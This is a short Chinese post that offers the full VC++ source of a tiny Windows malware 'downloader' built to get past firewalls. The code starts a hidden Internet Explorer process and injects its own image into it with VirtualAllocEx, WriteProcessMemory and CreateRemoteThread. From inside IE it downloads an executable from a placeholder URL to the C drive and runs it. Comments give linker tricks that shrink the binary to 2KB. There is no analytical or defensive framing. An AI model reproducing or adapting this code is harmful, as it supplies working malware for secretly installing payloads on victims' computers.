3k穿墙下载者VC源代码

1. /*
   
2.    "mini_downloader"
   
3.    code bykardinal p.s.t
   
4.    compile by vc++ 6.0
   
5.    can not run under win98;
   
6. */
   
7. #include <windows.h>  
   
8. 
   
9. #pragma comment(lib,"user32.lib")  
   
10. #pragma comment(lib,"kernel32.lib")  
    
11. 
    
12. //#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释，编译出的文件只有2K大小
    
13. //#pragma comment(linker, "/merge:.data=.text")   
    
14. //#pragma comment(linker, "/merge:.rdata=.text")   
    
15. //#pragma comment(linker, "/align:0x200")  
    
16. #pragma comment(linker, "/ENTRY:main")   
    
17. #pragma comment(linker, "/subsystem:windows")  
    
18. #pragma comment(linker, "/BASE:0x13150000")  
    
19.    
    
20.    HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
    
21.    DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
    
22.    HANDLE processhandle;
    
23.    DWORD pid;
    
24.    HINSTANCE hshell,hurlmon;
    
25. 
    
26. void download() //注入使用的下载函数
    
27. {
    
28.    hshell=LoadLibrary("Shell32.dll");
    
29.    hurlmon=LoadLibrary("urlmon.dll");
    
30. 
    
31.    (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
    
32.    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
    
33. 
    
34.    DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL);
    
35.    SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);  
    
36.    ExitProcess(0);
    
37. };
    
38.    
    
39. 
    
40. void main() //主函数
    
41. {   
    
42.     //1.得到IE路径,并运行
    
43.    char iename[MAX_PATH],iepath[MAX_PATH];
    
44.    ZeroMemory(iename,sizeof(iename));
    
45.    ZeroMemory(iepath,sizeof(iepath));
    
46. 
    
47.    GetWindowsDirectory(iepath,MAX_PATH);
    
48.    strncpy(iename,iepath,3);
    
49.    strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
    
50.    //strcat(iename,"windows\\notepad.EXE");
    
51.    WinExec(iename,SW_HIDE);
    
52.    Sleep(500);
    
53. 
    
54.    //2.得到 IE process handle
    
55.    HWND htemp;
    
56.    htemp=FindWindow("IEFrame",NULL);
    
57.    GetWindowThreadProcessId(htemp,&pid);
    
58.    processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    
59.    
    
60.    //3.分配内存
    
61.    HMODULE Module;
    
62.    LPVOID NewModule;
    
63.    DWORD Size;
    
64.    LPDWORD lpimagesize;
    
65. 
    
66.    Module = GetModuleHandle(NULL);//进程映像的基址
    
67.    //得到内存镜像大小
    
68.    _asm
    
69.    {
    
70.        push eax;
    
71.        push ebx;
    
72.        mov ebx,Module;
    
73.        mov eax,[ebx+0x3c];
    
74.        lea eax,[ebx+eax+0x50];     
    
75.        mov eax,[eax]
    
76.        mov lpimagesize,eax;
    
77.        pop ebx;
    
78.        pop eax;
    
79.    };
    
80.    Size=(DWORD)lpimagesize;
    
81.    NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
    
82. 
    
83.    //4.写内存，创建线程
    
84.    WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
    
85.    LPTHREAD_START_ROUTINE entrypoint;
    
86.    __asm
    
87.    {
    
88.        push eax;
    
89.        lea eax,download;
    
90.        mov entrypoint,eax;
    
91.        pop eax
    
92.    }
    
93.    
    
94.    CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //建立远程线程,并运行
    
95.    
    
96.    //5.关闭对象
    
97.    CloseHandle(processhandle);
    
98.    return;
    
99. } ;

复制代码